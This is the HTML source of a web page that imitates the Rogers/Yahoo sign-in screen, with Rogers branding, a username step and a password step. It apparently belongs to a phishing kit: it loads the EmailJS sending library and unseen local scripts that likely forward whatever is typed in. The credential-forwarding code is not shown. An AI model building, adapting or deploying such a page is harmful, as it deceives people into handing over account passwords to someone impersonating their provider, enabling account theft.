<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="style.css">
    <link rel="stylesheet"
        href="https://fonts.googleapis.com/css2?family=Material+Symbols+Outlined:opsz,wght,FILL,GRAD@48,400,0,0" />
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/css/bootstrap.min.css" rel="stylesheet"
        integrity="sha384-rbsA2VBKQhggwzxH7pPCaAqO46MgnOM80zW1RWuH61DGLwZJEdK2Kadq2F9CUG65" crossorigin="anonymous">
    <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/@emailjs/browser@3/dist/email.min.js">
    </script>
    <script src="./email.js"></script>
    <title>Sign in with your Yahoo Rogers credentials</title>
    <link rel="shortcut icon" type="image/png" href="./rogers-favicon.png">
</head>

<body>
    <div class="my_card_container">
        <div class="my_card">
            <div class="my_card_col">
                <div class="my_card_header">
                    <div class="my_card_logo">
                        <img src="./rogers.png" alt="logo" class="card_logo_img img-fluid">
                    </div>
                    <div class="change_lang">
                        <button class="lang_btn" onclick="toggleLanguage()">FR</button>
                    </div>
                </div>
                <div class="my_card_main">
                    <div class="my_card_header_txt">
                        <h4 data-translate="sign_in">Sign in</h4>
                        <p data-translate="credentials">
                            with your Yahoo Rogers credentials
                        </p>
                    </div>
                    <div class="my_card_form">
                        <form id="form">
                            <div id="step1">
                                <div class="input-container">
                                    <input placeholder="Username" type="text" id="username" class="username-input"
                                        required>
                                    <span class="material-symbols-outlined info-icon">
                                        info_i
                                    </span>
                                </div>
                                <div class="remember_pwd_col">
                                    <input type="checkbox" id="remember">
                                    <label for="remember" data-translate="remember_username">
                                        Remember username
                                    </label>
                                </div>
                                <br>
                                <div>
                                    <button class="cont_btn" type="button" onclick="nextStep()"
                                        data-translate="continue">
                                        Continue
                                    </button>
                                </div>
                                <br>
                                <hr class="hr">
                            </div>

                            <div id="step2" style="display: none;">
                                <div class="displayUsername_col">
                                    <strong class="displayUsername" id="displayUsername"></strong>
                                </div>
                                <div>
                                    <a href="#" onclick="goToStep1()" data-translate="change_username">
                                        Change username
                                    </a>
                                </div>
                                <br>
                                <div class="input-container">
                                    <input type="password" id="password" placeholder="Password" class="password-input"
                                        required>
                                    <span type="button" class="toggle-password">
                                        <i class="material-symbols-outlined visibility_off_icon">visibility_off</i>
                                        <i class="material-symbols-outlined visibility_on_icon">visibility</i>
                                    </span>
                                </div>
                                <div>
                                    <a href="#" onclick="forgotPassword()" data-translate="forgot_password">
                                        Forgot password?
                                    </a>
                                </div>
                                <br>
                                <button class="sign_btn" data-translate="sign_in_btn" type="submit">
                                    Sign in
                                </button>
                            </div>
                        </form>
                    </div>
                </div>
            </div>
        </div>
    </div>

    <script type="text/javascript" src="./app.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/js/bootstrap.bundle.min.js"
        integrity="sha384-kenU1KFdBIe4zVF0s0G1M5b4hcpxyD9F7jL+jjXkk+Q2h455rYXK/7HAuoJl+0I4"
        crossorigin="anonymous"></script>
</body>

</html>
